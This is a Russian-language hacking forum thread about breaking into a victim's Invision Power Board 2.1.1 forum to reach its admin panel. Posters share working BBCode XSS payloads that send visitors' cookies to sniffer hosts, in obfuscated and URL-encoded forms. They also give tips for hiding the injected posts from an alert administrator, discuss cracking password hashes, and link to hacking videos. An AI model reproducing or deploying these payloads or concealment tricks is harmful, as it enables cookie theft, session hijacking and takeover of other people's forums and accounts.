|
Вопрос по эксплойту для Ipb 2.1.1.
Привет! Нужен эксплойт для Ipb 2.1.1. Кто нить может помочь?
|
Код HTML:
[post=1000[topic=target style=background&*#58;url(javascript*:document.image*s	*1;&#*49;].*src=*"*h*;*6;*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7;	*9;*03;&*#105;*-*;b*;
*5;*10;&*#47;s.j&*#112;g?"+document.cookie); ] [/topic]] |
Седня вошел на форум-жертву тока хеш расшифровывать както в лом (по моему долгое это занятие). Естественно чтоб попасть в админку требует пароль юзера. Подскажите пожалуйста, есть какие нить реальные проги по раскодированию хэшей и может быть есть способ по другому попасть в админку.
ПС: FQziT за код спасибо - как проверю, если сработает + к репе с меня |
IPB 2.x ты хэш не расшифруешь
почему? - юзай поиск... |
Цитата:
|
Zheca
Нет. И пользуйся поиском по форуму. Об этом уже говорили. |
Ок! Все понял - кончаю тупить
|
Ввел код в сообщение - ниче не вышло - наверное я гдето лишнюю звездочку убрал
|
это уже где-то публиковали, так что надеюсь никто не против
http://kobeluga.narod.ru/codes.txt |
Там короче соль. Соль - это шифруется шифрованный пароль. Вот так.
Качай видео по взлому : http://video.antichat.net/archive/coyl/ipb2.rar http://video.antichat.net/archive/MicRo/ipb.rar http://video.antichat.net/archive/Li...mer/ipb20x.rar Всё. |
+ к репе FQziT
|
Смотря под чего блокали ? если по айпи то некак (только прокси),под ник если просто зареги новый и удали куки и файлы.
|
А если хост отрезали - то я понимаю тока прокси остается?
|
Отсканил сервак и получил " возможно, выполнить произвольный код на уязвимость системе". Есть эксплойт. Кто нить может ссылочку дать ссылочку?
|
Zheca Ты читать вообще умеешь?! Причём тут DDos атака и форумы IPB 2.1.1??? И вобще Античат против ДДоса.
|
Спасиб конечно за -1 :(( Я знаю что Античат против ДДос. Может я непонятно выразился - но я не собираюсь ддосить - меня интересует сторочка о выполнении произвольного кода. А сканил я сервак с установленным на нем ипб 2.1.1
И еще вопрос: а возможно всатвление кода не в пост а в название темы при ее создании? |
На воруме который я ломаю админ - гад уж больно прбитый и глазастый. Сходу вычисляет ссылочку на снифер - удаляет пост и юзера. Может быть стоит какая нить защита, которая активируется как тока я выкладываю ссылку на снифер?
|
Глазастый админ это прикольно=)
А серьёзно. Какой нибудь способ автоматом ловить внедрённый сниффер есть? |
Вопросик появился: После внедрения этого зловредного кода остается что-то вроде [topic/]]. Можно ли этого избежать?
|
Цитата:
но хз... у мя ничего не оставалось никогда... по поводу глазастых админов... не все XSS работают в Опере... опера не так воспринимает ` как IE ... короч маскируйте посты цветом.... оффтоп... а некоторые форумы типа ЭксББ не проверяют размер шрифта.... можно SIZE=0 поставить и вообще никто не разглядит чего там написано. |
Помог такой код:
Код HTML:
[EMAIL]wj@wj.com[URL=wj/style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/URL][/EMAIL]Имеется в виду символы адреса в код |
Код:
%5BEMAIL%5Dwj@wj.com%5BURL%3Dwj/style%3Dbackground%3Aurl%28javascript%3Adocument.images%5B1%5D.src%3D%22http%3A//s.netsec.ru/sec/pic.gif%3F%22document.cookie%29%3B%20%5D%5B/URL%5D%5B/EMAIL%5DНа вот так вроде! |
Можеш тут _http://webmastertools.narod.ru/OnlineTools/url_decode.html , поменяй сылку на снифер _http://antichat.ru/cgi-bin/s.jpg на http://s.netsec.ru/sec/pic.gif , и кодируй.
|
А если код вставить в свое же собщение, но в то которое я писал допустим ранее - ну отредактировать свое старое сообщение, он будет работать? То есть после него уже могло куча народу запостится - а так отредактирую старое сообщение и админу глаза не мозолит и мне приятно
|
Цитата:
|
Это понятно - это будет работать? - или нужно обязательно создавать новый пост?
|
Будет, при условии что оно отобразится на страничке у жертвы.
|
Эт я к вопросам по поводу того, что текст кода виден из других браузеров - и админ удаляет посты. Ведб это выход - запостится, подождать пока накопятся сообщения, и пока не совершился переход на следующую страницу - изменить свой первый пост вставив туда код. Пару, тройку юзеров можно поймать вот таким образом
|
Цитата:
|
| Время: 16:33 |